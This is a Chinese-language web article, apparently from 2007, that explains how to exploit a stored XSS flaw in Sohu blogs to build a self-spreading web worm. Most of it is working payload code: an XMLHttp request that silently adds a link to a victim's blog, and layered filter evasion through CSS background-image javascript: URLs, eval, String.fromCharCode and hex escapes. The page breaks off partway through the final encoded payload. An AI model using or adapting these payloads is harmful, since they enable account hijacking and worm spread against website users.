搜狐ajax hacking漏洞详解——XSS worm--搜狐,ajax hacking,漏洞,详解,XSS,worm

作者：佚名来源：网上收集发布时间：2007-1-8 21:21:18

搜狐博客存在ajax hacking漏洞，可以实现web worm的功能，下面是具体的利用方法：

标准的ajax数据提交，该ajax的XmlHttp方式为微软msdn提供的标准方法！

把以上代码缩成一行

window.onload=function(){var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","http://blog.sohu.com/manage/link.do?m=add&title=Monyer&desc=Monyer%20is%20my%20hero%20%21&link=http%3A//hi.baidu.com/monyer&_",true); XmlHttp.send(null);}

漏洞的利用方式

<div style="background-image:url(javascript:[code])">不能执行多语句，所以转到下面的方法eval进行
<div style="background-image:url(javascript:eval([code]))">有引号，所以转到下面的方法，String.fromCharCode
<div style="background-image:url(javascript:eval(String.fromCharCode([十进制的code])))">这回完成了

在eval里，代码可以自动执行，因此可以不用window.onload，同时去掉函数结构！

var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","http://blog.sohu.com/manage/link.do?m=add&title=Monyer&desc=Monyer%20is%20my%20hero%20%21&link=http%3A//hi.baidu.com/monyer&_",true); XmlHttp.send(null);

将上述代码进行String.fromCharCode转码

118,97,114,32,88,109,108,72,116,116,112,61,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,104,116,116,112,34,41,59,32,88,109,108,72,116,116,112,46,79,112,101,110,40,34,103,101,116,34,44,34,104,116,116,112,58,47,47,98,108,111,103,46,115,111,104,117,46,99,111,109,47,109,97,110,97,103,101,47,108,105,110,107,46,100,111,63,109,61,97,100,100,38,116,105,116,108,101,61,77,111,110,121,101,114,38,100,101,115,99,61,77,111,110,121,101,114,37,50,48,105,115,37,50,48,109,121,37,50,48,104,101,114,111,37,50,48,37,50,49,38,108,105,110,107,61,104,116,116,112,37,51,65,47,47,104,105,46,98,97,105,100,117,46,99,111,109,47,109,111,110,121,101,114,38,95,34,44,116,114,117,101,41,59,32,88,109,108,72,116,116,112,46,115,101,110,100,40,110,117,108,108,41,59

因此有如下代码，该代码是可以执行的，但会被sohu过滤掉，因此需要进一步加密！

再次加密后的结果！

<div style="BACKGROUND-image:\0075\0072\006c\0028\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0065\0076\0061\006c\0028\0053\0074\0072\0069\006e\0067\002e\0066\0072\006f\006d\0043\0068\0061\0072\0043\006f\0064\0065\0028\0031\0031\0038\002c\0039\0037\002c\0031\0031\0034\002c\0033\0032\002c\0038\0038\002c\0031\0030\0039\002c\0031\0030\0038\002c\0037\0032\002c\0031\0031\0036\002c\0031\0031\0036\002c\0031\0031\0032\002c\0036\0031\002c\0031\0031\0030\002c\0031\0030\0031\002c\0031\0031\0039\002c\0033\0032\002c\0036\0035\002c\0039\0039\002c\0031\0031\0036\002c\0031\0030\0035\002c\0031\0031\0038\002c\0031\0030\0031\002c\0038\0038\002c\0037\0039\002c\0039\0038\002c\0031\0030\0036\002c\0031\0030\0031\002c\0039\0039\002c\0031\0031\0036\002c\0034\0030\002c\0033\0034\002c\0037\0037\002c\0031\0030\0035\002c\0039\0039\002c\0031\0031\0034\002c\0031\0031\0031\002c\0031\0031\0035\002c\0031\0031\0031\002c\0031\0030\0032\002c\0031\0031\0036\002c\0034\0036\002c\0038\0038\002c\0037\0037\002c\0037\0036\002c\0031\0030\0034\002c\0031\0031\0036\002c\0031\0031\0036\002c\0031\0031\0032\002c\0033\0034\002c\0034\0031\002c\0035\0039\002c\0033\0032\002c\0038\0038\002c\0031\0030\0039\002c\0031\0030\0038\002c\0037\0032\002c\0031\0031\0036\002c\0031\0031\0036\002c\0031\0031\0032\002c\0034\0036\002c\0037\0039\002c\0031\0031\0032\002c\0031\0030\0031\002c\0031\0031\0030\002c\0034\0030\002c\0033\0034\002c\0031\0030\0033\002c\0031\0030\0031\002c\0031\0031\0036\002c\0033\0034\002c\0034\0034\002c\0033\0034\002c\0031\0030\0034\002c\0031\0031\0036\002c\0031\0031\0036\002c\0031\0031\0032\002c\0035\0038\002c\0034\0037\002c\0034\0037\002c\0031\0030\0039\002c\0031\0031\0031\002c\0031\0031\0030\002

[1] [2] 下一页